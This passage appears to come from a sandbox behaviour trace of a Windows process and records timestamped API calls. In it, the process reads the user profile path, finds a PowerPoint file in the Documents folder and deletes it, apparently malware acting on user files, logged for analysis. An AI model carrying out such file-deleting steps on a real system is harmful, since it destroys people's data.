hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0260.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0260.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0260.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0260.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0260.116] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.116] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.116] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0260.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0260.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0260.116] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0260.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0260.117] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0260.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0260.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0260.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0260.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0260.117] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0260.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0260.117] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0260.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0260.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0260.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0260.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0260.118] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.118] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.118] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.118] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.118] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.118] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.118] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0260.118] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.118] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0260.118] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.118] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.118] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.119] CryptReleaseContext (hProv=0xad31c0, dwFlags=0x0) returned 1 [0260.119] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.119] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.119] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.119] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.119] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.119] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.119] FreeLibrary (hLibModule=0x74d40000) returned 1 [0260.119] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.119] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.119] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.122] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.122] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.124] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0260.124] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0260.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0260.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0260.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0260.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0260.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0260.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7a0 [0260.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0260.124] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0260.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0260.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0260.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0260.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0260.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0260.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0260.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0260.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0260.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0260.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0260.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0260.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0260.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0260.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0260.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0260.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0260.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0260.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0260.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0260.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0260.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0260.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0260.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0260.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0260.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0260.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0260.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0260.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x84) returned 0x2420898 [0260.126] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/2tDiT2As-QJTabaRcc L.pptx", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tDiT2As-QJTabaRcc L.pptx", lpFilePart=0x8bedfc*="2tDiT2As-QJTabaRcc L.pptx") returned 0x41 [0260.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0260.126] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tDiT2As-QJTabaRcc L.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tdit2as-qjtabarcc l.pptx")) returned 0x20 [0260.126] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tDiT2As-QJTabaRcc L.pptx", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaaf4150, ftCreationTime.dwHighDateTime=0x1d4f3a8, ftLastAccessTime.dwLowDateTime=0xbddeed30, ftLastAccessTime.dwHighDateTime=0x1d4f4f7, ftLastWriteTime.dwLowDateTime=0xbddeed30, ftLastWriteTime.dwHighDateTime=0x1d4f4f7, nFileSizeHigh=0x0, nFileSizeLow=0xbb35, dwReserved0=0x19b4, dwReserved1=0x4, cFileName="2tDiT2As-QJTabaRcc L.pptx", cAlternateFileName="2TDIT2~1.PPT")) returned 0xaa5960 [0260.126] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tDiT2As-QJTabaRcc L.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tdit2as-qjtabarcc l.pptx")) returned 1 [0260.127] FindNextFileW (in: hFindFile=0xaa5960, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaaf4150, ftCreationTime.dwHighDateTime=0x1d4f3a8, ftLastAccessTime.dwLowDateTime=0xbddeed30, ftLastAccessTime.dwHighDateTime=0x1d4f4f7, ftLastWriteTime.dwLowDateTime=0xbddeed30, ftLastWriteTime.dwHighDateTime=0x1d4f4f7, nFileSizeHigh=0x0, nFileSizeLow=0xbb35, dwReserved0=0x19b4, dwReserved1=0x4, cFileName="2tDiT2As-QJTabaRcc L.pptx", cAlternateFileName="2TDIT2~1.PPT")) returned 0 [0260.127] FindClose (in: hFindFile=0xaa5960 | out: hFindFile=0xaa5960) returned 1 [0260.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0260.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0260.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0260.128] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0260.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0260.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0260.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0260.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0260.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0260.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0260.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0260.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0260.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0260.129] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0260.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0260.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0260.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7a0 [0260.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0260.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0260.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0260.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0260.129] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0260.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0260.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0260.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0260.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0260.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0260.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0260.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0260.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0260.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0260.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0260.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0260.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0260.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0260.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0260.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0260.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0260.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0260.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0260.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0260.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0260.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0260.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0260.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0260.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0260.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0260.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0260.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0260.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0260.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0260.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x84) returned 0x2420898 [0260.131] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/2tDiT2As-QJTabaRcc L.pptx", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tDiT2As-QJTabaRcc L.pptx", lpFilePart=0x8bf658*="2tDiT2As-QJTabaRcc L.pptx") returned 0x41 [0260.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0260.132] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tDiT2As-QJTabaRcc L.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tdit2as-qjtabarcc l.pptx")) returned 0xffffffff [0260.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0260.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0260.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0260.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0260.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0260.132] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0260.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0260.132] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0260.132] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0260.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0260.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0260.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0260.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0260.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0260.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0260.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0260.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) 